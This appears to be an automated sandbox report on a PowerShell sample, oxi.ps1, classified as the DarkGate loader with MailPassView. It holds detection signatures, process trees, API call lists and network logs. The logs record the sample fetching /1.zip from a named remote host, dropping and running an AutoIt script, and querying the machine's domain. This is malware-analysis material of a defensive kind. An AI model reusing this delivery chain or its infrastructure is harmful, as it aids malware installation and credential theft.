
Windows Analysis Report
oxi.ps1

Overview

General Information

Sample name: oxi.ps1
Analysis ID: 1448082
MD5: f391262039244472c29e2b3b788a4a79
SHA1: b6db78ac395a0191883670595a88bd0fa52a87f8
SHA256: d28c416add7fe55e7b1a20e30013e870cfb2eb3c9a5962ed4047766a43fa4f5e
Tags: ps1

Detection

DarkGate, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected DarkGate
Yara detected MailPassView
AI detected suspicious sample
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 7448 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • Autoit3.exe (PID: 7524 cmdline: "C:\downloads\Autoit3.exe" c:\\downloads\script.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)
      • cmd.exe (PID: 7540 cmdline: "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\kkdbffb\cehaheb MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7592 cmdline: wmic ComputerSystem get domain MD5: E2DE6500DE1148C7F6027AD50AC8B891)
  • cleanup
Name: DarkGate
Description: First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate
No configs have been found
Source | Rule | Description | Author
00000003.00000002.1742650595.0000000003919000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DarkGate | Yara detected DarkGate | Joe Security
00000003.00000002.1743157154.0000000003D2E000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_DarkGate | Yara detected DarkGate | Joe Security
00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
Source | Rule | Description | Author
amsi64_7276.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Strings:
  • 0x380:$b2: ::FromBase64String(
  • 0x35f:$b3: ::UTF8.GetString(
  • 0xbbfa:$s1: -join
  • 0x53a6:$s4: +=
  • 0x5468:$s4: +=
  • 0x968f:$s4: +=
  • 0xb7ac:$s4: +=
  • 0xba96:$s4: +=
  • 0xbbdc:$s4: +=
  • 0x19597:$s4: +=
  • 0x1969b:$s4: +=
  • 0x1caf7:$s4: +=
  • 0x1d1d7:$s4: +=
  • 0x1d68d:$s4: +=
  • 0x1d6e2:$s4: +=
  • 0x1d956:$s4: +=
  • 0x1d985:$s4: +=
  • 0x1decd:$s4: +=
  • 0x1defc:$s4: +=
  • 0x1dfdb:$s4: +=
  • 0x20272:$s4: +=

System Summary

Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1", ProcessId: 7276, ProcessName: powershell.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7276, TargetFilename: C:\downloads\Autoit3.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1", ProcessId: 7276, ProcessName: powershell.exe
No Snort rule has matched

AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: oxi.ps1 | Virustotal: Detection: 12%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 88.3% probability
Source: C:\downloads\Autoit3.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 167.235.238.203:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\downloads\Autoit3.exe | Code function: 3_2_00864005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00864005
Source: C:\downloads\Autoit3.exe | Code function: 3_2_0086C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_0086C2FF
Source: C:\downloads\Autoit3.exe | Code function: 3_2_0086494A GetFileAttributesW,FindFirstFileW,FindClose,3_2_0086494A
Source: C:\downloads\Autoit3.exe | Code function: 3_2_0086CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_0086CD9F
Source: C:\downloads\Autoit3.exe | Code function: 3_2_0086CD14 FindFirstFileW,FindClose,3_2_0086CD14
Source: C:\downloads\Autoit3.exe | Code function: 3_2_0086F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0086F5D8
Source: C:\downloads\Autoit3.exe | Code function: 3_2_0086F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0086F735
Source: C:\downloads\Autoit3.exe | Code function: 3_2_0086FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_0086FA36
Source: C:\downloads\Autoit3.exe | Code function: 3_2_00863CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00863CE2
Source: C:\downloads\Autoit3.exe | Code function: 3_2_011D2F39 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_011D2F39
Source: C:\downloads\Autoit3.exe | Code function: 3_2_03D1F314 FindFirstFileW,FindNextFileW,FindClose,3_2_03D1F314
Source: C:\downloads\Autoit3.exe | Code function: 3_2_03D1DF18 FindFirstFileW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose,3_2_03D1DF18
Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CF9DF0 FindFirstFileW,FindNextFileW,FindClose,3_2_03CF9DF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
    GET /1.zip HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: kostumn1.ilabserver.com
    Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\downloads\Autoit3.exe | Code function: 3_2_008729BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,3_2_008729BA
Source: global traffic | DNS traffic detected: DNS query: kostumn1.ilabserver.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: C:\downloads\Autoit3.exe | Code function: 3_2_00874632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_00874632
Source: C:\downloads\Autoit3.exe | Code function: 3_2_00874830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00874830
Source: C:\downloads\Autoit3.exe | Code function: 3_2_03D00DAC GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,3_2_03D00DAC
Source: C:\downloads\Autoit3.exe | Code function: 3_2_00860508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,3_2_00860508
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\downloads\Autoit3.exe | Code function: 3_2_0088D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_0088D164
Source: Yara match | File source: Process Memory Space: Autoit3.exe PID: 7524, type: MEMORYSTR
Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CF3704 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,3_2_03CF3704

System Summary

Source: amsi64_7276.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7276, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\downloads\Autoit3.exe
Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CECBF4 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,3_2_03CECBF4
Source: C:\downloads\Autoit3.exe | Code function: 3_2_03D17B38 NtDuplicateObject,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose,3_2_03D17B38
Source: C:\downloads\Autoit3.exe | Code function: 3_2_03D17A90 NtQueryObject,3_2_03D17A90
Source: C:\downloads\Autoit3.exe | Code function: 3_2_03D17A5C NtDuplicateObject,NtClose,3_2_03D17A5C
Source: C:\downloads\Autoit3.exe | Code function: 3_2_03D17DDC Sleep,TerminateThread,NtClose,NtClose,3_2_03D17DDC
Source: C:\downloads\Autoit3.exe | Code function: 3_2_008642D5: CreateFileW,DeviceIoControl,CloseHandle,3_2_008642D5
Source: C:\downloads\Autoit3.exe | Code function: 3_2_00858F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,3_2_00858F2E
Source: C:\downloads\Autoit3.exe | Code function: 3_2_00865778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,3_2_00865778
Source: Joe Sandbox View | Dropped File: C:\downloads\Autoit3.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
            Source: amsi64_7276.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7276, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@11/12@1/1
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086A6AD GetLastError,FormatMessageW,3_2_0086A6AD
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00858DE9 AdjustTokenPrivileges,CloseHandle,3_2_00858DE9
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00859399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,3_2_00859399
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086B976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,3_2_0086B976
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00864148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,3_2_00864148
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086C9DA CoInitialize,CoCreateInstance,CoUninitialize,3_2_0086C9DA
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,3_2_0086443D
            Source: C:\downloads\Autoit3.exeFile created: C:\Users\user\AppData\Roaming\HdaEKeAJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czenej3t.2ah.ps1Jump to behavior
            Source: C:\downloads\Autoit3.exe | Command line argument: 3_2_00815F8B
            Source: C:\downloads\Autoit3.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: oxi.ps1 | Virustotal: Detection: 12%
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\downloads\Autoit3.exe "C:\downloads\Autoit3.exe" c:\\downloads\script.a3x
            Source: C:\downloads\Autoit3.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\kkdbffb\cehaheb
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ComputerSystem get domain
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: textshaping.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: textinputframework.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: coreuicomponents.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\ipconfig.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\ipconfig.exe | Section loaded: dnsapi.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: wsock32.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: version.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: winmm.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: mpr.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: wininet.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: iphlpapi.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: userenv.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: uxtheme.dll
            Source: C:\downloads\Autoit3.exe | Section loaded: kernel.appcore.dll
